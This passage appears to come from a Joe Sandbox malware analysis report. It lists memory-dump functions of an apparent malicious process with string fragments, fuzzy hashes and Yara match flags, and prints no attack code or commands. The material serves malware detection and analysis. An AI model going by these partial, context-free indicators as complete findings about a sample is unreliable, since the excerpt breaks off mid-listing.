                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
                                                              • Instruction ID: c842170e35986ad51c37ec74d1d55b2c52a8e06e595a5fe0a8b6256c5b42a2e1
                                                              • Opcode Fuzzy Hash: 2905ebc795567ab577073a88ce364ad14b4c7e0c7208a1d6eed577e5a7b97f20
                                                              • Instruction Fuzzy Hash: 1721837AE0011AEBDB60DF79CC50ABF7BECAF54640F44011AEE05D7200E7309A118BA1
                                                              Function 015CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016102BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016102E7
                                                              • RTL: Re-Waiting, xrefs: 0161031E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
                                                              • Instruction ID: 64febbf7df254bfb85ed83b33eea6c0f49853955504cc92aca84194f2cc415c5
                                                              • Opcode Fuzzy Hash: 0f28f042852cd4302a4662dd521a550588369d1bb20ee0c3d5e97116fe120659
                                                              • Instruction Fuzzy Hash: 81E1CE306047429FDB25CF68C884B6ABBE2BB84B14F144A5EF5A5CB3E1D774D885CB42
                                                              Function 015DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01617B7F
                                                              • RTL: Resource at %p, xrefs: 01617B8E
                                                              • RTL: Re-Waiting, xrefs: 01617BAC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 55d8ce24d3739bd335f2c18d4be00d4987b8a359d75a8f9fb6a0488ec9351db5
                                                              • Instruction ID: 0c8c17f94cb2cd066512bf40a010c79ae9a0a9fe538678b62cf79dd07a5dfe89
                                                              • Opcode Fuzzy Hash: 55d8ce24d3739bd335f2c18d4be00d4987b8a359d75a8f9fb6a0488ec9351db5
                                                              • Instruction Fuzzy Hash: E641C0317017039FDB20DE2DCC40B6AB7E6FB9A710F100A5DE9569B280DB71E5058B91
                                                              Function 015DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0161728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01617294
                                                              • RTL: Resource at %p, xrefs: 016172A3
                                                              • RTL: Re-Waiting, xrefs: 016172C1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                              • Instruction ID: 914b7eb546666c05b54a7c9063245dda64420d117e68e67eda51351d8d1a3491
                                                              • Opcode Fuzzy Hash: 7a7ae82eff832ce83d77fe64e77a2e15cff419c62f3f541ee94ad7b67a8bd797
                                                              • Instruction Fuzzy Hash: 0641D031600616ABD721DE29CC41FAAB7A6FF95710F14861DF955EB340DB21E8428BD1
                                                              Function 01652300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                              • Instruction ID: 7227dc3ed0f7c235fcaaaf713d5b87da17d1a76bc6233c8913d78b874d4d7806
                                                              • Opcode Fuzzy Hash: 638b12263eea15451a7ae2fd5ed56937fc31de904e378891779fe0fa9dca57eb
                                                              • Instruction Fuzzy Hash: 0B318672A0021ADFDB60DF2DCC50BEE77F8FB44610F440599ED49E7241EB30AA598BA0
                                                              Function 015E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 9cbd0fc63c2d8edd8896ac6f24e52438fed25dbaed28a09d23758ee899f9d974
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: FF917371E002169EEB2CDF6DC8896BEBBE5FF48720F14451AE975AF2C0E73099408791
                                                              Function 015A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                              • Instruction ID: dd3dc1783d25360d4061558543ee3ed48abc0dbf094956145853f80ea9688a05
                                                              • Opcode Fuzzy Hash: a79f6badd34e1708eb222fbc6d7d80865972df8e8e48415d7818b05a86daa212
                                                              • Instruction Fuzzy Hash: C1811C71D4027A9BDB368F54CC54BEEB6B8BF48754F0045EAAA19B7280D7305E84CF64

                                                              Executed Functions

                                                              Function 03591B8B Relevance: 31.7, Strings: 25, Instructions: 469COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$ B$#$%y$19$2$>$D$E$GP$K_$PP$Qt$V$`J$c6$f$m$o$v>$x$}$,$>$_
                                                              • API String ID: 0-1984175023
                                                              • Opcode ID: 7704fa00fa424a47ad978bbc6c5729fa92d105ea550ac657f49fdc3e9c19f380
                                                              • Instruction ID: 27b1715631f186f934a3d6c38c0c1bed3b86555e928e8012bfb4cddf4369eadf
                                                              • Opcode Fuzzy Hash: 7704fa00fa424a47ad978bbc6c5729fa92d105ea550ac657f49fdc3e9c19f380
                                                              • Instruction Fuzzy Hash: 90428BB090526DDBEF68CF04D895BDDBBB2BB45308F1485DAD1096B291CBB95AC4CF80
                                                              Function 0359F90B Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$O$S$\$s
                                                              • API String ID: 0-3854637164
                                                              • Opcode ID: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                              • Instruction ID: e09c59a172fc0aef62a79cb6fe03ca38b5072fc3d9c8fbb42e0d3d63e73c49ed
                                                              • Opcode Fuzzy Hash: 74f2a845a8c98f1cbd2e33735c6ec5c448920ce1012c5b9301475194a65474ab
                                                              • Instruction Fuzzy Hash: 9C51E472D00219ABDF10EF94EC88EEEF3BCBB84705F04459AED099A154E7745A498BA1
                                                              Function 035ACB5B Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: yi
                                                              • API String ID: 0-2336885180
                                                              • Opcode ID: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                              • Instruction ID: 5134870fbd8c141c5a787552a020f5585294aa5c308f05553c34f3031160bab6
                                                              • Opcode Fuzzy Hash: 7e633b2ae547646173275aff670ba6d686053eb1c4c3826f853a7315fe6ab9b1
                                                              • Instruction Fuzzy Hash: C821EDB6D01219AFCB00DFE9D8408EFB7F9FF88210F04456AE919E7200E6715A058BA1
                                                              Function 0358B1AD Relevance: .1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                              • Instruction ID: 862a181990b1b1fbf21a064823be8c5545cf2872463a3381591842aa9624a241
                                                              • Opcode Fuzzy Hash: 83c8bc8962ae1cda7f0d8d7b3d7564616a9d97dafb668fcbcb9444032b6bf7e8
                                                              • Instruction Fuzzy Hash: C04118B1D11219AFDB00DF99D885AEEBBBCFF48710F10415AFA05E7240E7B0A641CBA4
                                                              Function 035B027B Relevance: .1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                              • Instruction ID: 021f97452a112f03aefe3d66481a046f0b462b886ac0705414e61bdd2a73283a
                                                              • Opcode Fuzzy Hash: f413d01f484df2d047b2e8d45919c4bb039abd2104dac6aa64f115fee20feb2e
                                                              • Instruction Fuzzy Hash: 0631E7B5A00749ABDB14DF98D881EEFB7B9FF88300F108119F909AB244D774A911CBA5
                                                              Function 035B0B7B Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                              • Instruction ID: ca56945316f2e75c8b348a28b75eb78cf60991954a088b51d752e1b2734bdfb7
                                                              • Opcode Fuzzy Hash: 218d563c39c0a71cd3337df9d9d62a9197f35fc4b4fe87b00bf36fddaed69bb2
                                                              • Instruction Fuzzy Hash: 9F210AB5A04749ABDB14DF98DC81EEFB7B8EB88700F108509F909AB244D774A911CBA5
                                                              Function 0359F74B Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                              • Instruction ID: 645a3ebd876b59954492b12e568da890661f47bc4818d8b6d6fa3f9735ff9b7f
                                                              • Opcode Fuzzy Hash: 963cbaa09def02e4d1eb9250690dfd1d3dff3227b0342066ff4c39344effe0cf
                                                              • Instruction Fuzzy Hash: CB1173B63803057AF720EE559C82FEB777CABD5B15F244015FB08AF1C0DAA5B81146B4
                                                              Function 035B009B Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                              • Instruction ID: fc784ab92ee7d9d4f453dad0554c6fedca7137a10d0f9f370d1220ac7461f856
                                                              • Opcode Fuzzy Hash: a4ead1439963b26653c200fde1fbbf3326f591bd6fe7ccce56ac6fc5d71bfee7
                                                              • Instruction Fuzzy Hash: 43118B75A04719ABD710EF98EC41FEB77BCEB85700F104409F949AB280EA746A01CBA5
                                                              Function 035AFF1B Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                              • Instruction ID: f29322e3b998f1a28e5b159ec0481a5976aab5c2fd4bb33df2153c28ae78ec0c
                                                              • Opcode Fuzzy Hash: 65140a3b059ee79970d215b499d4bce6e3d18515d929f97248ad41fbe4fefd5c
                                                              • Instruction Fuzzy Hash: 81118E75A40B096BD710EF98DC85FEF73BCFB85710F004509F909AB280EA716A01CBA5
                                                              Function 035ADE9B Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                              • Instruction ID: 30f39cd42a6f3fb9c42e79a57f4e3bf6cccc3b00574d9c6639ceb87a2a66bf75
                                                              • Opcode Fuzzy Hash: b9ff44f630e79ce15d8ce08663523b67a53b04885dae65d290f6903aa3378063
                                                              • Instruction Fuzzy Hash: 00113DB6D01219AF9B00DFA9E8509EEB7F8FF88200F44416AE919E7200E7715A01CFA0
                                                              Function 035B0EBB Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 6dbdb741fdea0d45f37d473878710c58f65ebf0a9a8ffb27596a6128244c77b5
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: A701AEB6215608BBCB44DE99DC90EEB77BDEB8C710F508208BA09E7240D630F9518BA4
                                                              Function 035ACACB Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                              • Instruction ID: d3f20d558cb9688e0f26a86b86d0e701714d4e878fd9aa92e4ac5c1fd30043da
                                                              • Opcode Fuzzy Hash: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                              • Instruction Fuzzy Hash: DF01A9B6C0121DAFCB40EFE8D9419EEBBF8BB58200F54466ED515F7240E7755A048FA1
                                                              Function 0358B2FF Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                              • Instruction ID: 117622259ca3d30d13da90608164b9b9cf95585a845a6787052e0e7f56b1fef2
                                                              • Opcode Fuzzy Hash: cdd70f869fbf5487031d0afd2b1b7b48b218c4ec3db5d7e01abbeb37a10cc71c
                                                              • Instruction Fuzzy Hash: 9CF0B4736006166BD710AB5DBC84B9BF7ACFBC4220F140222F91DEB2A0DA7294518690
                                                              Function 0359F902 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                              • Instruction ID: bcf06d7f1144c23daa5800f80a929c385ae8444155a8ded1b312a59d3e22b7fb
                                                              • Opcode Fuzzy Hash: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                              • Instruction Fuzzy Hash: 5DF02D768082856EDB11EB50DC98DFFBF78BFD6210F0445C9D4081F171D630998AC765
                                                              Function 035B019B Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                              • Instruction ID: 061f0f6b98e56afb5295d558a9b6734ee12492f33d33f04e1f9331ead49995e3
                                                              • Opcode Fuzzy Hash: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                              • Instruction Fuzzy Hash: A6F0FE752006097BDA10EE89DC81EAB77BCEFC8710F004419BA0997241D670B9118BB4
                                                              Function 0359F86B Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                              • Instruction ID: 0509443a52dd31dfde986d8658fcacb1eb52f0c42a1b0c4c29c28ff7b8460373
                                                              • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                              • Instruction Fuzzy Hash: C5F01271C1520DEBDF14DF64E841BDEBBB8EB44320F1087AAE825DB2C0D63597958B81
                                                              Function 035B0DFB Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: c8a57af7579114c8084f5bf7e922193a278f236cb409c2723242fba1292238dd
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: E1E065762003187BC614EF99EC91EAB33BCEFC8710F000408FA09AB240C631BA108BB8
                                                              Function 035B2C3B Relevance: .0, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                              • Instruction ID: 9b2dd78356ba20344d5c1ae298664c49b45bbfa7ce80871b19e878c5dd602ab1
                                                              • Opcode Fuzzy Hash: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                              • Instruction Fuzzy Hash: 24E0863664071437C2219989AC45FDBB77CEBC5E70F094525FE08AB354E661F90242F4
                                                              Function 035B0AEB Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: e36b7209f6c6db84766e71d2115eea227297e8c50e733405fa2105e69686e3f9
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: ADE0463A200A15BBD220FA99EC41EABB77CFBC6710F404415FA09AB640C671B9158BB4
                                                              Function 035925B7 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2730d1f77fc109b5a47d9fe3ca0a6293cafa887ce2be5d70882dbadab973652c
                                                              • Instruction ID: 981acaf4edcd3ca485012050a482f87a010501e47e12c4f63c1c437b96b83ac8
                                                              • Opcode Fuzzy Hash: 2730d1f77fc109b5a47d9fe3ca0a6293cafa887ce2be5d70882dbadab973652c
                                                              • Instruction Fuzzy Hash:

                                                              Non-executed Functions

                                                              Function 035AA08B Relevance: 34.0, Strings: 27, Instructions: 265COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                              • API String ID: 0-1002149817
                                                              • Opcode ID: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                              • Instruction ID: 18ba91092fc551ac118080194e04a226dd12ccbc38b173f51af7af90628b223b
                                                              • Opcode Fuzzy Hash: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                              • Instruction Fuzzy Hash: E5C11DB1D00329AEDF20DFA4DC44BDEBBB8BF45304F004599E548AB251E7B55A88CF65
                                                              Function 03591B58 Relevance: 31.4, Strings: 25, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_3220000_hrhhgLQrQIpiVv.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$ B$#$%y$19$2$>$D$E$GP$PP$Qt$V$`J$c6$f$m$o$v>$x$y$}$,$>$_
                                                              • API String ID: 0-4064015928
                                                              • Opcode ID: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                              • Instruction ID: e61cb91068d1dadb6c56ff2f0be5e234679371cca0c9ce9d1592d1298781a9e0
                                                              • Opcode Fuzzy Hash: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                              • Instruction Fuzzy Hash: 65A177B0D05669CBFB65CF41C9987CEBBB1BB45308F1081D9C14C2B291DBBA1A99CF91
                                                              Function 035A271B Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
